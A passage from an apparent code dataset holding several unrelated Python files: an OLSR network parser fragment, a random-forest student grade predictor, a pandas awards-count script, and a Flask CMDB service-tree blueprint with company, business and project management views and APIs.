link[\"lastHopIP\"]\n dest = link[\"destinationIP\"]\n cost = link[\"tcEdgeCost\"]\n except KeyError as e:\n raise NetParserException('Parse error, \"%s\" key not found' % e)\n # original olsrd cost (jsoninfo multiplies by 1024)\n cost = float(cost / 1024)\n # add link to Graph\n graph.add_edge(source, dest, weight=cost)\n self.graph = graph\n # determine version and revision\n if 'config' in data:\n version_info = data['config']['olsrdVersion'].replace(' ', '').split('-')\n self.version = version_info[1]\n # try to get only the git hash\n if 'hash_' in version_info[-1]:\n version_info[-1] = version_info[-1].split('hash_')[-1]\n self.revision = version_info[-1]\n","sub_path":"netdiff/parsers/olsr.py","file_name":"olsr.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"618576032","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\n\nDIR = 'DATA_DIRECTORY'\nTITLES_INITIAL_TRAINING_DATA = ['STUDENTID', 'SCORE', 'GRADE', 'ASKQUESTION', 'TEXTINGINCLASS', 'LATEINCLASS']\nTITLES_INITIAL_TESTING_DATA \\\n = ['STUDENTID', 'SCORE', 'GRADE', 'ON_SMARTPHONE', 'ASKS_QUESTIONS', 'LATE_IN_CLASS']\n\ninitial_training_data = pd.read_csv(DIR + 
'/moody_training_data.csv')\ninit_testing_data = pd.read_csv(DIR + '/moody_testing_data.csv')\n\n\n# drop the leaves_early column as there is no comparable data within the training set available\ninitial_testing_data = init_testing_data.drop(columns=['LEAVES_EARLY'])\n\n# convert all data to numbers\ninitial_transposed_training_data = initial_training_data.values.transpose()\ninitial_transposed_testing_data = initial_testing_data.values.transpose()\n\n\ndef covert_grade_to_number(data_of_interest, transposed):\n for i in range(0, data_of_interest.shape[0]):\n if transposed[2][i] == 'A':\n transposed[2][i] = 1\n if transposed[2][i] == 'B':\n transposed[2][i] = 2\n if transposed[2][i] == 'C':\n transposed[2][i] = 3\n if transposed[2][i] == 'D':\n transposed[2][i] = 4\n if transposed[2][i] == 'E':\n transposed[2][i] = 5\n if transposed[2][i] == 'F':\n transposed[2][i] = 6\n\n\ndef convert_to_number(data_of_interest, transpose, idx, str_1, str_2, str_3):\n for i in range(0, data_of_interest.shape[0]):\n if transpose[idx][i] == str_1:\n transpose[idx][i] = 1\n if transpose[idx][i] == str_2:\n transpose[idx][i] = 2\n if transpose[idx][i] == str_3:\n transpose[idx][i] = 3\n\n\ndef convert():\n covert_grade_to_number(initial_training_data, initial_transposed_training_data)\n covert_grade_to_number(initial_testing_data, initial_transposed_testing_data)\n convert_to_number(initial_training_data, initial_transposed_training_data, 3, 'never', 'rarely', 'frequently')\n convert_to_number(initial_training_data, initial_transposed_training_data, 4, 'never', 'sometimes', 'always')\n convert_to_number(initial_training_data, initial_transposed_training_data, 5, 'never', 'rarely', 'always')\n convert_to_number(initial_testing_data, initial_transposed_testing_data, 3, 'never', 'rarely', 'frequently')\n convert_to_number(initial_testing_data, initial_transposed_testing_data, 4, 'never', 'sometimes', 'always')\n convert_to_number(initial_testing_data, initial_transposed_testing_data, 5, 'Never', 'Sometimes', 'Yes')\n\n\nconvert()\n\ntraining_data_conv = pd.DataFrame(initial_transposed_training_data.transpose(), columns=TITLES_INITIAL_TRAINING_DATA)\ntesting_data_conv = pd.DataFrame(initial_transposed_testing_data.transpose(), columns=TITLES_INITIAL_TESTING_DATA)\ntesting_data_conv = \\\n testing_data_conv[['STUDENTID', 'SCORE', 'GRADE', 'ASKS_QUESTIONS', 'ON_SMARTPHONE', 'LATE_IN_CLASS']]\n\n# find span of scores for given grade\ngrade_score_df = training_data_conv[['SCORE']].join(training_data_conv[['GRADE']])\nscore_for_grade_c = grade_score_df.query(\"GRADE == 3\")\nprint(score_for_grade_c)\nprint('minimal score for grade C')\nprint(score_for_grade_c['SCORE'].min)\n\n# plot the data\ngrade_vs_score = training_data_conv.plot(x='SCORE', y='GRADE', style='o')\nplt.ylabel('GRADE')\nplt.show()\n\n# split into independent and dependent variables\nfinal_training_data = training_data_conv.drop(columns=['GRADE'])\nlabels_training_data = training_data_conv[['GRADE']]\nfinal_testing_data = testing_data_conv.drop(columns=['GRADE'])\nlabels_testing_data = testing_data_conv[['GRADE']]\n\n\n# split into training and validation set\nX_train, X_val, y_train, y_val = \\\n train_test_split(final_training_data.values, labels_training_data.values, test_size=0.05, random_state=1)\n\n\n# create a random forest model\nmodel = RandomForestClassifier(n_estimators=300, n_jobs=-1, random_state=0, oob_score=True)\nmodel.fit(X_train, np.ravel(y_train.astype('int')))\n\n# prediction on the validation set\nprediction = 
model.predict(X_val)\nprint(prediction)\nprint(np.ravel(y_val))\n\ndifference_predicted_true = prediction - np.ravel(y_val)\nincorrect_predictions = list(filter(lambda x: x != 0, difference_predicted_true))\npercentage_correctly_classified = 1 - np.size(incorrect_predictions) / np.size(difference_predicted_true)\nprint(percentage_correctly_classified)\n\n# apply the model to the test set and create a dataframe with these predictions\ntest_prediction = model.predict(final_testing_data.values)\npredicted_grades_df = pd.DataFrame(test_prediction, columns=['PREDICTED_GRADE'])\ntest_data_with_predictions = final_testing_data.join(predicted_grades_df)\n\nprint(test_data_with_predictions.head())\ngrade_vs_score_test = test_data_with_predictions.plot(x='SCORE', y='PREDICTED_GRADE', style='o')\nplt.ylabel('PREDICTED_GRADE')\nplt.show()\n\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"71833710","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 8 13:44:39 2017\n\n@author: yuchenli\n\"\"\"\n\nimport pandas as pd\naward = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/Truven_rising_stars/profile_awards/profile_awards.csv\", sep = \",\", encoding = 'ISO-8859-1')\n\naward_count = dict()\nfor i in range(len(award)):\n key = award.loc[i,\"HBE_ID\"]\n if key not in award_count:\n award_count[key] = 1\n else:\n award_count[key] += 1\n \n# Mark KOL among Report-Tags\nname_standard = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/Truven_rising_stars/education_manual_annotation/Profile_Education_Institution_Standard_UTF-8.csv\", sep = \",\", encoding = 'ISO-8859-1')\ntarget = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/Truven_rising_stars/education_manual_annotation/profile_education_Report-Tags.csv\", sep = \",\", encoding = 'utf-8')\n\nKOL_Report_Tags = dict()\nKOL_HBE_ID_set = set(name_standard.loc[:,'HBE_ID'])\n\nfor i in set(target.loc[:,'HBE_ID']):\n if i in KOL_HBE_ID_set:\n KOL_Report_Tags[i] = 1\n else:\n KOL_Report_Tags[i] = 0\n\n# Write to csv\nimport csv\nwith open(\"/Users/yuchenli/Box Sync/Yuchen_project/Truven_rising_stars/profile_awards/awards_count.csv\", \"w\") as csvfile:\n fieldnames = ['HBE_ID', \"awards_count\", \"KOL\"]\n writer = csv.DictWriter(csvfile, fieldnames = fieldnames)\n writer.writeheader()\n for key, value in award_count.items():\n try:\n writer.writerow({'HBE_ID': key, \"awards_count\": value, \"KOL\": KOL_Report_Tags[key]})\n except:\n pass","sub_path":"profile_awards/profile_awards.py","file_name":"profile_awards.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"476074376","text":"# -*- coding: UTF-8 -*-\nimport sys\nimport json\nimport re\nimport copy\n\nreload(sys)\nsys.setdefaultencoding(\"utf8\")\n\n\nfrom flask import Blueprint,render_template,request,jsonify,redirect,make_response,url_for\nfrom modules import conf\nfrom modules import relationship as cmdb\nfrom modules import logs\nfrom modules import auths as _users\np = _users.Permission()\n\nb_service_tree = Blueprint('b_service_tree', __name__)\n\nlog = logs.Loger()\napplications = cmdb.OpsApplications()\n\n\n'''服务树 公司管理方法类 '''\n@b_service_tree.route('/st_company',methods=['POST', 'GET'])\n@p.is_login\n@p.is_user_view\n@p.is_sys_admin\ndef st_company():\n result = {}\n c = cmdb.OpsSubCompany()\n\n\n # 
删除的时候传参过来的东西\n status = request.values.get(\"status\", \"\")\n message = request.values.get(\"message\", \"\")\n if status.isdigit():\n result = {\"code\":int(status),\"message\":message}\n\n # Search\n key = request.values.get(\"key\",\"\").strip()\n if key:\n companys = c.select_rows(key=key)\n return render_template(\"st_company.html\", companys=companys, key=key, result=result)\n else:\n redirect(\"/st_companys\")\n\n companys = c.select_rows()\n\n return render_template(\"st_company.html\", companys=companys, result=result)\n\n@b_service_tree.route('/st_company_add', methods=['POST', 'GET'])\n@p.is_login\n@p.is_user_view\n@p.is_sys_admin\ndef st_company_add():\n result={}\n c = cmdb.OpsSubCompany()\n username = request.cookies.get(\"username\", \"\").strip()\n\n name = request.form.get(\"company\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n if name and owner:\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.insert_vs(name, owner, remark, en_name):\n result = {\"code\":0,\"message\":\"添加成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加公司:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"写入数据出错,是否公司名称重复。\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加公司:{0}\".format(name),0)\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_company_add.html\",result=result,users=users)\n\n@b_service_tree.route('/st_company_update', methods=['POST', 'GET'])\n@p.is_login\n@p.is_user_view\n@p.is_sys_admin\ndef st_company_update():\n result = {}; company = {}\n username = request.cookies.get(\"username\", \"\")\n\n c = cmdb.OpsSubCompany()\n\n id = request.values.get(\"id\")\n name = request.form.get(\"company\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n if id and name and owner and en_name: # 更新\n params = {\"id\":id}\n record = {\n \"name\":name,\n \"owner\":owner,\n \"remark\":remark,\n \"en_name\": en_name,\n }\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.update_vs(params=params,record=record):\n result = {\"code\":0,\"message\":\"更新成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:更新公司:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"更新数据出错\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:更新公司:{0}\".format(name),0)\n\n else:\n company = [] #init company\n if id:\n record = [\"id\",\"name\",\"owner\",\"remark\",\"en_name\"]\n params = {\"id\":id}\n company = c.select(record=record,params=params)\n if company: company= company[0]\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_company_update.html\",result=result, company=company, users=users)\n\n@b_service_tree.route('/st_company_delete', methods=['POST', 'GET'])\n@p.is_login\n@p.is_user_view\n@p.is_sys_admin\ndef st_company_delete():\n c = cmdb.OpsSubCompany()\n username = request.cookies.get(\"username\", \"\")\n\n id = request.values.get(\"id\",\"\")\n name = request.values.get(\"name\",\"\")\n if id:\n if c.delete_vs(companyid=id):\n result = {\"code\":0,\"message\":\"删除成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除公司:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"删除失败,请先删除该[ {name} ]公司下的业务\".format(name=name)}\n 
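# delete_vs() presumably returns a falsy value while the company still owns business lines (inferred from the failure message above), so this branch only logs the refusal; the code/message pair is surfaced to the list page through the redirect at the bottom of the view.\n 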
log.write(username,\"serviceTree\",\"服务树:业务线管理:删除公司:{0}\".format(name),0)\n else:\n result = {\"code\":1,\"message\":\"参数不全\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除公司:{0}:参数不全\".format(name),0)\n return redirect(url_for(\"b_service_tree.st_company\",\n status = result.get(\"code\", \"\"),\n message= result.get(\"message\",\"\")))\n\n@b_service_tree.route('/st_company_dash', methods=['POST', 'GET'])\n@p.is_login\ndef st_company_dash():\n c = cmdb.OpsSubCompany(); dashs={}; result={} # init Vars\n company_id = request.values.get(\"company_id\", 0)\n if company_id:\n dashs = c.dash(company_id)\n else:\n result = {\"code\":1, \"message\":\"未提供公司的ID号\"}\n\n\n return render_template(\"st_company_dash.html\", dashs=dashs, result=result)\n\n'''服务树 业务管理方法类 '''\n@b_service_tree.route('/st_business', methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_business():\n result = {} ; business=[] # init var\n c = cmdb.OpsBusiness()\n\n\n # 删除的时候传参过来的东西\n status = request.values.get(\"status\", \"\")\n message = request.values.get(\"message\", \"\")\n if status.isdigit():\n result = {\"code\":int(status),\"message\":message}\n\n # 专项 Search\n business_name = request.values.get(\"business_name\",\"\").strip()\n company_name = request.values.get(\"company_name\",\"\").strip()\n business_id = request.values.get(\"business_id\",\"\").strip()\n\n if company_name or business_name or business_id:\n if company_name:\n business = c.select_rows(sub_company_name=company_name)\n elif business_name:\n business = c.select_rows(business_name=business_name)\n elif business_id:\n business = c.select_rows(businessid=business_id)\n else:\n redirect(\"/st_business\")\n return render_template(\"st_business.html\", business=business, business_name=business_name, result=result)\n\n\n # Search\n key = request.values.get(\"key\", \"\").strip()\n if key:\n business = c.select_rows(key=key)\n return render_template(\"st_business.html\", business=business, key=key, result=result)\n\n #返回给前端获取数据,GET.\n #record = [\"id\",\"name\",\"sub_company_id\",\"sub_company_name\",\"owner\",\"opser\",\"developers\",\"create_at\",\"remark\"]\n business = c.select_rows()\n return render_template(\"st_business.html\", business=business, result=result)\n\n@b_service_tree.route('/st_business_add', methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_business_add():\n result = {} ; business=[] # init var\n c = cmdb.OpsBusiness()\n username = request.cookies.get(\"username\",\"\")\n\n name = request.form.get(\"business\",\"\").strip()\n sub_company_id = request.form.get(\"sub_company_id\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n opser = request.form.get(\"opser\",\"\").strip()\n developers = request.form.get(\"developers\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n if name and sub_company_id and owner and opser and developers and en_name:\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.insert_vs(name,sub_company_id,owner,opser,developers,remark,en_name):\n result = {\"code\":0,\"message\":\"添加成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加业务:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"写入数据出错\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加业务:{0}\".format(name),0)\n else:\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加业务:{0}:参数不全\".format(name),0)\n 
#result = {\"code\":1,\"message\":\"参数不全\"}\n\n ops_sub_company = cmdb.OpsSubCompany()\n record = [\"id\",\"name\"]\n companys = ops_sub_company.select(record=record,params={})\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_business_add.html\",result=result, companys=companys, users=users)\n\n@b_service_tree.route('/st_business_update', methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_business_update():\n result = {} ; business=[] # init var\n c = cmdb.OpsBusiness()\n username = request.cookies.get(\"username\", \"\")\n\n name = request.form.get(\"business\",\"\").strip()\n sub_company_id = request.form.get(\"sub_company_id\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n opser = request.form.get(\"opser\",\"\").strip()\n developers = request.form.get(\"developers\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n id = request.values.get(\"id\",\"\")\n if id and name and owner and opser and developers and sub_company_id and en_name:\n params = {\"id\":id}\n record = {\n \"name\":name,\n \"sub_company_id\":sub_company_id,\n \"owner\":owner,\n \"opser\":opser,\n \"developers\":developers,\n \"remark\":remark,\n \"en_name\" : en_name,\n }\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.update_vs(params=params,record=record):\n result = {\"code\":0,\"message\":\"更新成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:修改业务:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"更新数据出错\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:修改业务:{0}\".format(name),0)\n elif id:\n record = [\"id\",\"name\",\"sub_company_id\",\"owner\",\"opser\",\"developers\",\"remark\",\"en_name\"]\n params = {\"id\":id}\n business = c.select(record=record,params=params)\n if business: business= business[0]\n\n # get companys to static\n ops_sub_company = cmdb.OpsSubCompany()\n record = [\"id\",\"name\"]\n companys = ops_sub_company.select(record=record,params={})\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_business_update.html\",result=result, companys=companys,\n business=business,users=users)\n\n@b_service_tree.route('/st_business_delete', methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_business_delete():\n result = {} ; business=[] # init var\n c = cmdb.OpsBusiness()\n username = request.cookies.get(\"username\", \"\")\n\n id = request.values.get(\"id\",\"\")\n name = request.values.get(\"name\",\"\")\n if id:\n if c.delete_vs(business_id=id):\n result = {\"code\":0,\"message\":\"删除成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除业务:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"删除失败,请先删除该[ {name} ]业务下的项目\".format(name=name)}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除业务:{0}\".format(name),0)\n else:\n result = {\"code\":1,\"message\":\"参数不全\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除业务:{0}:参数不全\".format(name),0)\n return redirect(url_for(\"b_service_tree.st_business\",\n status = result.get(\"code\", \"\"),\n message= result.get(\"message\",\"\")))\n\n@b_service_tree.route('/st_business_dash', methods=['POST', 'GET'])\n@p.is_login\ndef st_business_dash():\n b = cmdb.OpsBusiness(); dashs={}; result={} # init Vars\n business_id = request.values.get(\"business_id\", 0)\n if business_id:\n dashs = b.dash(business_id)\n else:\n result = {\"code\":1, 
\"message\":\"未提供业务的ID号\"}\n\n return render_template(\"st_business_dash.html\", result=result, dashs=dashs)\n\n\n@b_service_tree.route('/st_project',methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_project():\n result = {}; projects={} # init Vars\n c = cmdb.OpsProject()\n\n # 删除的时候传参过来的东西\n status = request.values.get(\"status\", \"\")\n message = request.values.get(\"message\", \"\")\n if status.isdigit():\n result = {\"code\":int(status),\"message\":message}\n\n # 项 Search\n project_name = request.values.get(\"project_name\",\"\").strip()\n project_id = request.values.get(\"project_id\",\"\").strip()\n if project_name or project_id:\n if project_id:\n projects = c.select_rows(projectid=project_id)\n else:\n projects = c.select_rows(project_name=project_name)\n\n return render_template(\"st_project.html\", projects=projects, project_name=project_name, result=result)\n\n # Search\n key = request.values.get(\"key\", \"\").strip()\n if key:\n projects = c.select_rows(key=key)\n return render_template(\"st_project.html\", projects=projects, key=key, result=result)\n\n #返回给前端获取数据,GET.\n #record = p.id,p.name,c.id AS sub_company_id,c.name as sub_company_name,b.id AS business_id,\n # b.name AS business_name, p.owner,p.opser,p.developers,p.create_at,p.remark\n projects = c.select_rows()\n return render_template(\"st_project.html\", projects=projects, result=result)\n\n@b_service_tree.route('/st_project_add',methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_project_add():\n result = {} # init var\n c = cmdb.OpsProject()\n username = request.cookies.get(\"username\", \"\")\n\n name = request.form.get(\"project\",\"\").strip()\n sub_company_id = request.form.get(\"sub_company_id\", \"\").strip()\n business_id = request.form.get(\"business_id\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n opser = request.form.get(\"opser\",\"\").strip()\n developers = request.form.get(\"developers\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n if name and business_id and owner and opser and developers and en_name:\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.insert_vs(name,business_id,sub_company_id,owner,opser,developers,remark, en_name):\n result = {\"code\":0,\"message\":\"添加成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加项目:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"写入数据出错\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加项目:{0}\".format(name),0)\n else:\n pass\n #result = {\"code\":1,\"message\":\"参数不全\"}\n\n #返回公司,然后前端根据选定的公司ID利用Jquery去查接口获取公司下面的业务\n ops_sub_company = cmdb.OpsSubCompany()\n record = [\"id\",\"name\"]\n companys = ops_sub_company.select(record=record,params={})\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_project_add.html\",result=result, companys=companys, users=users)\n\n@b_service_tree.route('/st_project_update',methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_project_update():\n result = {}; business=[]; projects=[] # init var\n username = request.cookies.get(\"username\", \"\")\n\n c = cmdb.OpsProject()\n\n name = request.form.get(\"project\",\"\").strip()\n business_id = request.form.get(\"business_id\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n opser = request.form.get(\"opser\",\"\").strip()\n developers = 
request.form.get(\"developers\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n\n id = request.values.get(\"id\",\"\")\n if id and name and owner and opser and developers and business_id and en_name:\n params = {\"id\":id}\n record = {\n \"name\":name,\n \"business_id\":business_id,\n \"owner\":owner,\n \"opser\":opser,\n \"developers\":developers,\n \"remark\":remark,\n \"en_name\" : en_name,\n }\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.update_vs(params=params,record=record):\n result = {\"code\":0,\"message\":\"更新成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:更新项目:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"更新数据出错\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:更新项目:{0}\".format(name),0)\n elif id:\n #返回给前端获取数据,GET.\n #record = p.id,p.name,c.id AS sub_company_id,c.name as sub_company_name,b.id AS business_id,\n # b.name AS business_name, p.owner,p.opser,p.developers,p.create_at,p.remark\n projects = c.select_rows(projectid=id)\n if projects:\n projects= projects[0]\n sub_company_id = projects[2]\n ops_business = cmdb.OpsBusiness()\n params = {\"sub_company_id\":sub_company_id}\n record = [\"id\",\"name\"]\n business = ops_business.select(params=params,record=record)\n\n # get companys to static\n ops_sub_company = cmdb.OpsSubCompany()\n record = [\"id\",\"name\"]\n companys = ops_sub_company.select(record=record,params={})\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_project_update.html\",result=result, companys=companys,\n business=business, projects=projects, users=users)\n\n\n@b_service_tree.route('/st_project_delete',methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_project_delete():\n result = {}; business=[]; projects=[] # init var\n c = cmdb.OpsProject()\n username = request.cookies.get(\"username\", \"\")\n\n id = request.values.get(\"id\",\"\")\n name = request.values.get(\"name\",\"\")\n if id:\n if c.delete_vs(project_id=id):\n result = {\"code\":0,\"message\":\"删除成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除项目:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"删除失败,请先删除该[ {name} ]项目下的机器\".format(name=name)}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除项目:{0}\".format(name),0)\n else:\n result = {\"code\":1,\"message\":\"参数不全\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除项目:{0}:参数不全\".format(name),0)\n\n return redirect(url_for(\"b_service_tree.st_project\",\n status = result.get(\"code\", \"\"),\n message= result.get(\"message\",\"\")))\n\n@b_service_tree.route('/st_project_dash', methods=['POST', 'GET'])\n@p.is_login\ndef st_project_dash():\n p = cmdb.OpsProject(); dashs={}; result={} # init Vars\n project_id = request.values.get(\"project_id\", 0)\n if project_id:\n dashs = p.dash(project_id)\n else:\n result = {\"code\":1, \"message\":\"未提供项目的ID号\"}\n\n return render_template(\"st_project_dash.html\", result=result, dashs=dashs)\n\n\n'''Applications'''\n@b_service_tree.route('/st_applications', methods=['POST', 'GET'])\ndef st_applications():\n '''返回应用信息'''\n key = request.values.get('key', \"\")\n push_type = request.values.get('push_type', \"\")\n\n if request.method == 'POST':\n pass\n\n data = applications.select(key, push_type)\n return render_template('st_applications.html', data=data)\n\n\n'''Stree'''\n@b_service_tree.route('/st_service_tree') 
#API获取公司名下的业务\n@p.is_login\n@p.is_user_view\ndef st_service_tree():\n return render_template(\"st_service_tree.html\")\n\n@b_service_tree.route('/st_service_newtree')\ndef st_service_newtree():\n return render_template(\"st_new_tree.html\")\n\n'''需求方不需要应用管理'''\n# @b_service_tree.route('/st_application',methods=['POST', 'GET']) # serviceTree company\n# @test_login\n# def st_application(username):\n# result = {\n# \"data\" :{\n# \"applications\" : [\n# (1,\"zabbix-server\",1,\"沈龙\",\"左文洪\",\"赵阳\",\"2017-08-08 09:00:00\",\"无备注\"),\n# (1,\"zabbix-mysql\",1,\"沈龙\",\"左文洪\",\"赵阳\",\"2017-08-08 09:00:00\",\"无备注\"),\n# (1,\"falcon-trasfer\",1,\"沈龙\",\"左文洪\",\"赵阳\",\"2017-08-08 09:00:00\",\"无备注\"),\n# ],\n# },\n# }\n# return render_template(\"st_application.html\", result=result)\n\n\n'''API'''\n\n@b_service_tree.route('/api/st_get_companys') #API获取公司列表\n@p.is_login\ndef api_st_get_companys():\n # /api/st_get_companys\n c = cmdb.OpsSubCompany()\n record = [\"id\", \"name\"]\n companys = c.select(record=record)\n result = {\n \"code\": 0,\n \"message\": \"success\",\n \"data\" : {\n \"companys\" : companys,\n },\n }\n return jsonify(result)\n\n@b_service_tree.route('/api/st_get_bussiness') #API获取公司名下的业务\n@p.is_login\ndef api_st_get_bussiness():\n # /api/st_get_bussiness?company_id=4\n id = request.values.get(\"company_id\",\"\")\n if not id:\n result = {\"code\":1,\"message\":\"请输入公司ID\"}\n return jsonify(result)\n\n c = cmdb.OpsBusiness()\n params = {\"sub_company_id\":id}\n record = [\"id\",\"name\"]\n business = c.select(params=params,record=record)\n if not business:\n result = {\"code\":1,\"message\":\"无公司或公司下无业务\"}\n return jsonify(result)\n\n result = {\n \"code\": 0,\n \"message\": \"success\",\n \"data\" : {\n \"business\" : business,\n },\n }\n return jsonify(result)\n\n@b_service_tree.route('/api/st_get_projects') #API获取公司名下的业务\n@p.is_login\ndef api_st_get_projects():\n # /api/st_get_projects?business_id=4\n id = request.values.get(\"business_id\",\"\")\n if not id:\n result = {\"code\":1,\"message\":\"请输入业务ID\"}\n return jsonify(result)\n\n c = cmdb.OpsProject()\n params = {\"business_id\":id}\n record = [\"id\",\"name\"]\n projects = c.select(params=params,record=record)\n if not projects:\n result = {\"code\":1,\"message\":\"无公司或公司下无业务\"}\n return jsonify(result)\n\n result = {\n \"code\": 0,\n \"message\": \"success\",\n \"data\" : {\n \"projects\" : projects,\n },\n }\n return jsonify(result)\n\n\ndef make_bussiness_tree(data,cindex,company_id,ops_business,ops_project,ops_machine):\n '''\n 生成公司下的业务线树形结构\n :param data: 用来生成树形结构的list\n :param cindex: 索引\n :param company_id: 数据库中公司id\n :param ops_business: cmdb.OpsBusiness()对象\n :param ops_project: cmdb.OpsProject()对象\n :param ops_machine: cmdb.OpsMachineInfo()对象\n :return:\n '''\n # 获取company_id下的业务\n record = [\"id\", \"name\"]\n parmas = {\"sub_company_id\": company_id}\n business = ops_business.select(record=record, params=parmas)\n # print company_id,business #每个公司ID对应的业务==>73 ((562, u'\\u4fdd\\u9669'),)\n\n for bindex, (business_id, business_name) in enumerate(business):\n data[cindex][\"children\"].append({\"text\": business_name, \"children\": []})\n # 获取业务下的项目\n record = [\"id\", \"name\"]\n params = {\"business_id\": business_id}\n projects = ops_project.select(record=record, params=params)\n # print business_id,projects #每个业务线ID对应的项目==>562 ((681, u'\\u4fdd\\u9669'),)\n for pindex, (project_id, project_name) in enumerate(projects):\n # 项目级\n data[cindex][\"children\"][bindex][\"children\"].append({\"text\": project_name, 
